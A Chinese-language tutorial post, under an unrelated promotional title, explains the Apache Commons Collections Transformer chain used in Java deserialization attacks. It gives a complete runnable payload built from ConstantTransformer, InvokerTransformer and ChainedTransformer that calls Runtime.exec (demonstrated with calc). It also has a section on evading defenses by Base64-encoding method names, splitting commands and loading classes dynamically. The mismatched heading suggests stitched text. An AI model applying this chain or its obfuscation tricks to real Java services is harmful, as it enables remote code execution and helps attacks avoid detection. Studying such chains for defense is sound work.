网站页面热度产品推广计划方案模板
Transformer链是CC反序列化漏洞的"执行引擎",本文聚焦Transformer链的核心原理和实现机制,为后续完整利用链分析奠定基础。
一、Java命令执行与序列化限制
1.1 常规命令执行方式
Java中执行系统命令的标准方法是通过Runtime类:
Runtime.getRuntime().exec("calc.exe");
1.2 序列化的致命限制
Runtime类未实现Serializable接口:
public class Runtime {// 未实现Serializable接口private static Runtime currentRuntime = new Runtime();// ...
}
关键问题:反序列化时无法直接构造Runtime实例执行命令。
二、反射突破序列化限制
通过反射机制可间接调用Runtime:
Class<?> runtimeClass = Class.forName("java.lang.Runtime");
Method getRuntime = runtimeClass.getMethod("getRuntime");
Object runtime = getRuntime.invoke(null);
Method exec = runtimeClass.getMethod("exec", String.class);
exec.invoke(runtime, "calc.exe");
优势:涉及的所有类(Class、Method)都实现了Serializable接口。
三、Transformer链核心组件
3.1 InvokerTransformer:反射执行引擎
public class InvokerTransformer implements Transformer, Serializable {private final String iMethodName;private final Class[] iParamTypes;private final Object[] iArgs;public Object transform(Object input) {if (input == null) return null;try {Class cls = input.getClass();Method method = cls.getMethod(iMethodName, iParamTypes);return method.invoke(input, iArgs);} catch (Exception e) {throw new FunctorException(...);}}
}
3.2 ConstantTransformer:常量提供器
public class ConstantTransformer implements Transformer, Serializable {private final Object iConstant;public static Transformer getInstance(Object constantToReturn) {return (Transformer)(constantToReturn == null ? NULL_INSTANCE : new ConstantTransformer(constantToReturn));}public Object transform(Object input) {return this.iConstant;// 无视输入,始终返回固定值}}
核心价值:为调用链提供初始对象(如Runtime.class)。
3.3 ChainedTransformer:链式执行器
public class ChainedTransformer implements Transformer, Serializable {private final Transformer[] iTransformers;public Object transform(Object object) {for(int i = 0; i < this.iTransformers.length; ++i) {object = this.iTransformers[i].transform(object);}return object;}
}
链式调用原理:
输出1 = 组件1.transform(输入)
输出2 = 组件2.transform(输出1)
...
最终结果 = 组件N.transform(输出N-1)
四、完整Transformer链构造
4.1 分步拆解命令执行
// 1. 获取Runtime.class对象
Object step1 = Runtime.class;// 2. 获取getRuntime方法
Method step2 = step1.getClass().getMethod("getRuntime");// 3. 调用getRuntime()获取Runtime实例
Runtime step3 = (Runtime) step2.invoke(null);// 4. 执行exec方法
step3.exec("calc.exe");
4.2 转换为Transformer实现
Transformer[] chain = new Transformer[]{// 步骤1:获取Runtime.classnew ConstantTransformer(Runtime.class),// 步骤2:反射调用getMethod("getRuntime")new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class},new Object[]{"getRuntime", new Class[0]}),// 步骤3:反射调用invoke(null)new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null, new Object[0]}),// 步骤4:调用exec("calc.exe")new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
};
4.3 链式执行
public class TransformerDemo {public static void main(String[] args) {ChainedTransformer chain = new ChainedTransformer(transformers);chain.transform(null); // 触发命令执行}
}
4.4 调用链
Gadget chain:ChainedTransformer.transform()ConstantTransformer.transform()InvokerTransformer.transform()Method.invoke()Class.getMethod()InvokerTransformer.transform()Method.invoke()Runtime.getRuntime()InvokerTransformer.transform()Method.invoke()Runtime.exec()
五、关键技术点解析
5.1 反射执行优势
- 绕过Runtime的序列化限制
- 方法调用通过字符串传递,可动态构造
- 参数类型完全可控
5.2 类型转换处理
// 自动处理类型转换
Object runtime = method.invoke(...); // 返回Object类型
// 下一级Transformer自动接收Object类型输入
5.3 空输入处理
chain.transform(null);
// ConstantTransformer无视输入,返回Runtime.class
// 后续组件基于前一步输出执行
六、防御规避技巧
6.1 方法名混淆
// 使用Base64编码方法名
String method = new String(Base64.getDecoder().decode("Z2V0UnVudGltZQ=="));
new InvokerTransformer(method, ...);
6.2 命令混淆
// 拆分命令+拼接执行
new InvokerTransformer("exec", new Class[]{String[].class},new Object[]{new String[]{"cmd", "/c", "calc.exe"}}
);
6.3 多态加载
// 通过ClassLoader动态加载
Class cls = Class.forName("java.lang." + "Runtime", true, Thread.currentThread().getContextClassLoader()
);
七、完整Payload示例
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.*;
import java.lang.reflect.Method;public class FullTransformerChain {public static void main(String[] args) throws Exception {// 构造Transformer链Transformer[] transformers = new Transformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})};// 链式执行ChainedTransformer chain = new ChainedTransformer(transformers);chain.transform(null);}
}
执行效果:成功弹出计算器程序
八、总结
8.1 核心技术总结
| 组件 | 作用 | 关键特性 |
|---|---|---|
InvokerTransformer | 反射执行任意方法 | 方法名/参数类型动态指定 |
ConstantTransformer | 提供初始对象 | 无视输入,返回固定值 |
ChainedTransformer | 链式调用Transformer | 前序输出作为后续输入 |
8.2 当前局限
- 需主动调用transform():反序列化不会自动触发
- 无隐蔽性:直接包含Runtime等敏感类名